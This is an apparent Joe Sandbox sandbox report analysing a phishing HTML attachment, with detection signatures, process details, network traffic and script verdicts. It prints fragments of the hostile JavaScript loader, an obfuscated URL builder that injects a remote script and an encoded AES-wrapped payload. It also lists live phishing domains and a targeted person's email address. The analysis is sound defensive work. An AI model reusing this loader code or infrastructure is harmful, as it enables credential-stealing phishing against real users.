Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7394231845.html

Overview

General Information

Sample name:7394231845.html
Analysis ID:1579373
MD5:c7de723158c8b53d3c188c38a79c7051
SHA1:42b6a23b76ecdb4b1fcfd1fdae83127fce10ba5d
SHA256:e040246823ce7f4075402a5bb5e26acbeb123d9f7e7f5a594e9d0d455d036df5
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 4484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\7394231845.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2220,i,2674854293145745611,13744225234503133344,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelario.panagsagan@globalfoundries.comSlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: 0.1.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/7394231845.html... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The use of obfuscated code and the collection of user data (email address) further increase the risk. Overall, this script exhibits a high level of malicious intent and should be considered a significant security threat.
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelar... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelar... This script exhibits several high-risk behaviors, including detecting browser automation tools, disabling common keyboard shortcuts, and attempting to redirect the user to an external domain. The use of a setInterval loop with a debugger statement is also a concerning behavior that could be used to detect and evade security tools. Overall, this script demonstrates a high level of malicious intent and should be treated with caution.
Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelar... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script uses the `turnstile.render()` function to render a form, and then sets up event handlers for the form submission. When the form is submitted, the script sends data to an unknown domain and redirects the user to a SharePoint domain, which is suspicious. Additionally, the script uses obfuscated URLs and dynamic code execution, which are further indicators of malicious intent. Overall, this script poses a high risk and should be thoroughly investigated.
Source: 7394231845.htmlHTTP Parser: Low number of body elements: 0
Source: 7394231845.htmlHTTP Parser: Base64 decoded: barramundi = `https:`+`//bill`+`otti`+`sorgan`+"zing.co"+'m/res'+"444.php"+'?2-'+`687`+`4747073`+"3a2f2f"+'5446362e'+`6a717`+`56762`+'6374636'+"4732"+"e7275"+'2f3'+`070`+"683"+`12f-yew`+'wo'+`od`;document['write']("<script src='" + barramundi + "'><\/scr...
Source: https://billottisorganzing.com/res444.php?2-68747470733a2f2f5446362e6a7175676263746364732e72752f307068312f-yewwoodHTTP Parser: var isckpgtumgflnmgh = document.createelement("script");isckpgtumgflnmgh.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(isckpgtumgflnmgh);isckpgtumgflnmgh.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoit2pmneprsk82blvnytlywe4xwfbzzen6exh2r3vyswvonkc3szq0y09tcncrenf5n3zsuuowzuc0d3iwnvdwsmvewlfqq29fwhlpm2hqm1pra09qwgvlrfwvewxlmelpm24rr0htzkgzdw55wjdpnwjxuhdsdhr1qju2rupqtjvkmlfhwnc4mtvhulczwmvqmuwxemq2thrizfjtbtzzbkfxrm1vvgjicvjkxc91mkhprursrlhlmflkakjjvjc1c2jzvdvmtwtqwmlrewjpzkmxrjgxnuiwbmdnaelfbxqwsnhtczlad0g0r2y4azhkvug2dkrnd2pczu9txc96qvfpr2jhwwlsrk9kce1unmqzsmvgvmdca25htflxd0rishfcl0q4ugxkk3e3xc9wwwpiykxfww14t2y4wgfcmutnd1jqqxe5xc9jr1b6y0o1meg2bnl6cmorsgkrqkjpxc81wgrwddrdk1zjz2livg9bbzjqahj4vk5ynklxy1o4u1fzruxrz3dttvvuvldavzv3buo0bja1qwr1zvlxq200eg9uavdtcct1tvjor0pbqlhsu2zjwxurwkhevwrswfjsmhr3cwhtzjjuufhzutarovk2bfdnqwtpmtd1ywm5dzrarkhnvjdlvghitjy1alvpd0jvmdltngjlaxcrujrcs2qynwzyszviuxvjs1g3y3j5dwnty3vuvtzaxc9zrde3um...
Source: 7394231845.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/7394231845.htmlHTTP Parser: No favicon
Source: https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelario.panagsagan@globalfoundries.comHTTP Parser: No favicon
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f5446362e6a7175676263746364732e72752f307068312f-yewwood HTTP/1.1Host: billottisorganzing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f5446362e6a7175676263746364732e72752f307068312f-yewwood HTTP/1.1Host: billottisorganzing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0ph1/ HTTP/1.1Host: tf6.jqugbctcds.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tf6.jqugbctcds.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tf6.jqugbctcds.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tf6.jqugbctcds.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tf6.jqugbctcds.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://tf6.jqugbctcds.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f5bc0d96a8b0caa&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: tf6.jqugbctcds.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tf6.jqugbctcds.ru/0ph1/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikl3aHpaTmtlTy84RUVMbHNHNy9ITmc9PSIsInZhbHVlIjoiSDVKSHNoWTJ6TGtBNi9QMlVuYnJNVXQyNkVTNmVkUnlKcDR6VmxmS0NPVkE3RE55UzNsYk4wS1NHTHJHTWhRcXlBZ1ZINEJvUTZRYUFmRHdoaHAvWkV2MWRCUGNXS2taMFVMT2tqeHhQT0RwUlpmMXFQSTRqcDBFQmNia2VmT3UiLCJtYWMiOiI4MTljN2ViYWE3Yzc3YWFmNGRmMDA4NWY5MzFjMjJmNDNkNjJkM2M1ZmNiMmQzNTk1Zjc5NzY3NTZmNDIwMjBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik40U2EycFJReFRIbUFXQ3QrK1doWGc9PSIsInZhbHVlIjoicytjaFlxR1JSQ0l2R0x5dWtqSzdRbHR4TC81a3VSbWlYYVRQckVIUUVtOWlYcW1JQW11dFJkWStNNndtdlNlUmVEam1QNlE1Mlh6bzk2UjE3ekRUeldKTThFYi9OS05ib2JzWmM4KzA3M21wUWZCcGhQM0gxcS8vUDd0TGtCVXoiLCJtYWMiOiJlM2Q5NDVkNTM5ZDRlZDRlMDg0OTljYTkxMTJkNGYwMGEzZjhmZWZmMmM0ZDEzNWI2Yzg0Y2ZiOTc0ZjZmMjIwIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f5bc0d96a8b0caa&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f5bc0d96a8b0caa/1734824809472/0068747f3768a1b24c413c2962aa9534744d0a8cc5fcb76f23f2c498ea18bb03/1-Bd7uYuoqxOXy_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f5bc0d96a8b0caa/1734824809476/4QWAiHdGMOFBFnN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f5bc0d96a8b0caa/1734824809476/4QWAiHdGMOFBFnN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /13969733940135742186QBaVJJEPNDNHBZEJMKLGFKSODYUFRAXZJQPSJLVGPSOLEMMDQJNPZMCD HTTP/1.1Host: 2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://tf6.jqugbctcds.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://tf6.jqugbctcds.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /13969733940135742186QBaVJJEPNDNHBZEJMKLGFKSODYUFRAXZJQPSJLVGPSOLEMMDQJNPZMCD HTTP/1.1Host: 2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: billottisorganzing.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: tf6.jqugbctcds.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru
Source: global trafficDNS traffic detected: DNS query: www.sharepoint.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
